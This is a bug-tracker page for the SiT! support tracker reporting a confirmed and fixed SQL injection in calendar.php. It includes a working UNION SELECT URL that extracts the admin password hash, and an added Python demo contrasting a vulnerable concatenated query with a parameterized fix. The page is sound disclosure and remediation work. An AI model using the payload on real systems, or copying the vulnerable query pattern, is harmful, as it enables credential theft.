SiT! Bugs - SiT!
View Issue Details
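ID: 0001395
Project: SiT!
Category: calendar
View Status: public
Date Submitted: 2010-09-08 15:28
Last Update: 2011-04-16 15:07
Reporter: Tomse
Assigned To: paulh
Priority: normal
Severity: major
Reproducibility: unable to reproduce
Status: closed
Resolution: fixed
Product Version: 3.62 LTS
Target Version: 3.63 LTS
Fixed in Version: 3.63 LTS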
Summary: 0001395: possible SQL injection

Description:
/calendar.php?display=list&type=1 union all select 1,2,3,4,5,6,7,8,9,10,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sit_users where id=1;--

I was given this line, it should extract the admin hash, I haven't been able to repro it.

Steps to Reproduce:
Log in to SiT as any user, paste the above URL modified to your system (don't forget the sit_users table).

This will list the user admin with the hashed password value in the users field.

Additional Information:
I've been able to reproduce this, both in the 3.62 and SVN.

Tags: security
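
The injection reported above, reduced to a runnable case, as an added example that is not part of the original report or SiT!'s code: a request value concatenated into an unquoted numeric comparison lets a UNION pull `password` from `sit_users`, while digit validation plus a bound parameter rejects it. The query shape, the `calendar_demo` table, the sample rows and the use of SQLite are assumptions.

```python
import re
import sqlite3

# Constructed payload: the value of `type` from the report, cut down to the
# two columns of the demo query below (the report pads to the real column count).
PAYLOAD = "1 union all select 1,password from sit_users where id=1"

def make_db():
    """In-memory stand-in; calendar_demo and the sample rows are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sit_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE calendar_demo (id INTEGER PRIMARY KEY, type INTEGER, owner TEXT);
        INSERT INTO sit_users VALUES (1, 'admin', 'CONSTRUCTED-HASH');
        INSERT INTO calendar_demo VALUES (1, 1, 'alice'), (2, 2, 'bob');
    """)
    return db

def list_entries_concatenated(db, raw_type):
    """Vulnerable pattern: the request value lands in an unquoted numeric context."""
    sql = "SELECT id, owner FROM calendar_demo WHERE type = " + raw_type
    return db.execute(sql).fetchall()

def list_entries_bound(db, raw_type):
    """Hardened: accept digits only, then pass the value as a bound parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_type):
        raise ValueError("type must be a non-negative integer")
    sql = "SELECT id, owner FROM calendar_demo WHERE type = ?"
    return db.execute(sql, (int(raw_type),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", list_entries_concatenated(db, PAYLOAD))
    print("bound, type=1:", list_entries_bound(db, "1"))
    try:
        list_entries_bound(db, PAYLOAD)
    except ValueError as exc:
        print("bound, payload rejected:", exc)
```

Because the parameter sits in a numeric context, no quote character is needed to break out of it, so quote escaping alone would not have stopped the request.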
Issue History
2010-09-08 15:28 | Tomse | New Issue
2010-09-11 12:33 | Tomse | Description Updated | bug_revision_view_page.php?rev_id=180#r180
2010-09-11 12:33 | Tomse | Steps to Reproduce Updated | bug_revision_view_page.php?rev_id=182#r182
2010-09-11 12:35 | Tomse | Description Updated | bug_revision_view_page.php?rev_id=183#r183
2010-09-11 13:44 | kieran | Note Added: 0003408
2010-09-11 13:44 | kieran | Assigned To | => kieran
2010-09-11 13:44 | kieran | Status | new => confirmed
2010-10-09 11:16 | paulh | Status | confirmed => assigned
2010-10-09 11:16 | paulh | Assigned To | kieran => paulh
2010-10-09 11:24 | ivan | Note Added: 0003426
2010-10-09 11:27 | paulh | Note Added: 0003427
2010-10-09 11:32 | paulh | Note Added: 0003428
2010-10-09 11:32 | paulh | Status | assigned => resolved
2010-10-09 11:32 | paulh | Resolution | open => fixed
2010-10-09 11:32 | paulh | Fixed in Version | => 3.63 LTS
2010-10-09 11:32 | paulh | Target Version | => 3.63 LTS
2010-10-09 11:32 | paulh | Tag Attached: security
2011-04-16 13:21 | ivan | Note Added: 0003708
2011-04-16 13:23 | ivan | Note Added: 0003709
2011-04-16 13:23 | ivan | View Status | private => public
2011-04-16 15:07 | ivan | Note Added: 0003714
2011-04-16 15:07 | ivan | Status | resolved => closed

Notes
(0003408) kieran, 2010-09-11 13:44
Confirmed here.

(0003426) ivan, 2010-10-09 11:24
I can confirm this too.

(0003427) paulh, 2010-10-09 11:27
Yep, I've managed to repro and have a fix almost ready.

(0003428) paulh, 2010-10-09 11:32
r6693 and 58e5772 resolve this.

This exploit is only available to authenticated users.

(0003708) ivan, 2011-04-16 13:21
http://www.autosectools.com/Advisories/Support.Incident.Tracker.3.62_Reflected.Cross-site.Scripting_132.html

(0003709) ivan, 2011-04-16 13:23
Magpierss issue fixed in r7110 and Git 5d06e50.

(0003714) ivan, 2011-04-16 15:07
Fix Released in 3.63